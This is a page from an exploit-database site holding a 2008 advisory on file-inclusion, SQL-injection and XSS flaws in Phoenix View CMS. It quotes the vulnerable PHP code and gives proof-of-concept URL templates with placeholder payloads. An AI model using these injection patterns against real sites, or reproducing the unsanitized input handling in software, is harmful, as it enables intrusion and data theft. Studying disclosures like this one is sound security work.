0day.today - Biggest Exploit Database in the World.
Things you should know about 0day.today:
Administration of this site uses the official contacts. Beware of impostors!
- We use one main domain: http://0day.today
- Most of the materials is completely FREE
- If you want to purchase the exploit / get V.I.P. access or pay for any other service,
you need to buy or earn GOLD
Administration of this site uses the official contacts. Beware of impostors!
We DO NOT use Telegram or any messengers / social networks!
Please, beware of scammers!
Please, beware of scammers!
- Read the [ agreement ]
- Read the [ Submit ] rules
- Visit the [ faq ] page
- [ Register ] profile
- Get [ GOLD ]
- If you want to [ sell ]
- If you want to [ buy ]
- If you lost [ Account ]
- Any questions [ admin@0day.today ]
- Authorisation page
- Registration page
- Restore account page
- FAQ page
- Contacts page
- Publishing rules
- Agreement page
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
You can contact us by:
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
Phoenix View CMS <= Pre Alpha2 (SQL/LFI/XSS) Multiple Vulnerabilities
===================================================================== Phoenix View CMS <= Pre Alpha2 (SQL/LFI/XSS) Multiple Vulnerabilities ===================================================================== ######################################################################################### Phoenix View CMS <= Pre Alpha2 Multiple Vulnerabilities [LFI][SQLI][XSS] ######################################################################################### Found by : tw8 Date : 8.05.2008 Bug type : LFI, SQLI & XSS ######################################################################################### Affected software description: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Application : Phoenix View CMS Version : <= Pre Alpha2 Vendor : http://sourceforge.net/projects/phoenixviewcms/ Description : Phoenix View CMS is going to be an easy to use Content-Managemen-System. It's using a self-written Template-Engine. The CMS will use a self-written API and it's gonna be easy to write your own plugins and modules. ######################################################################################## Vulnerabilities: ~~~~~~~~~~~~~~~ Vulnerable code #1 in admin/admin_frame.php [LFI]+[XSS]: ---------------------------------------------------------------------------- [code] if(isset($_GET["ltarget"])) { $ltarget=$_GET["ltarget"]; $_SESSION["lastsecaction"]=''; } ...... if(!file_exists(SYSTEM_ADMIN_path . "/" . $ltarget . ".php")) { printError("System Admin Seite \"" . $ltarget . "\" wurde nicht gefunden."); } else { include SYSTEM_ADMIN_path . $ltarget . ".php"; } [/code] ---------------------------------------------------------------------------- POC #1: http://www.target.com/path/admin/admin_frame.php?ltarget=[LOCAL FILE]%00 http://www.target.com/path/admin/admin_frame.php?ltarget=[XSS] ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Vulnerable code #2 admin/module/*.php [SQLI]: ---------------------------------------------------------------------------- [code] class db { ...... function query($query,$ressave=false) { if($ressave) return mysql_query($query); else { $this->res = mysql_query($query); return $this->res; } } ...... } ...... if(isset($_GET["del"])) { $db->query("DELETE from " . SYSTEM_dbpref . "todo where id='".$_GET["del"]."'"); echo "<font color='green'>Loschen erfolgreich</font><br />\n"; } /*Vulnerable files: gbuch.admin.php links.admin.php menue.admin.php news.admin.php todo.admin.php */ [/code] ---------------------------------------------------------------------------- POC #2: http://www.target.com/path/admin/module/vulnerable_file.php?del=[SQLI] ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Vulnerable code #3 admin/module/*.php [XSS]: ---------------------------------------------------------------------------- [code] <input type='hidden' name='conf' value='<?php if(isset($_GET["conf"])) echo $_GET["conf"];else echo $_POST["conf"]; ?>' /> /*Vulnerable files: gbuch.admin.php links.admin.php menue.admin.php news.admin.php todo.admin.php */ [/code] ---------------------------------------------------------------------------- POC #3: http://www.target.com/path/admin/module/vulnerable_file.php?conf=[XSS] ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Status: ~~~~~~~ Vendor has not been contacted yet. ########################################################################### Shoutz to vladiii, kw3rln, Nemessis, Kenpachi, Moubik, DranaXum, Inside & all RST Members. ################################ [ EOF ] ################################## # 0day.today [2024-11-15] #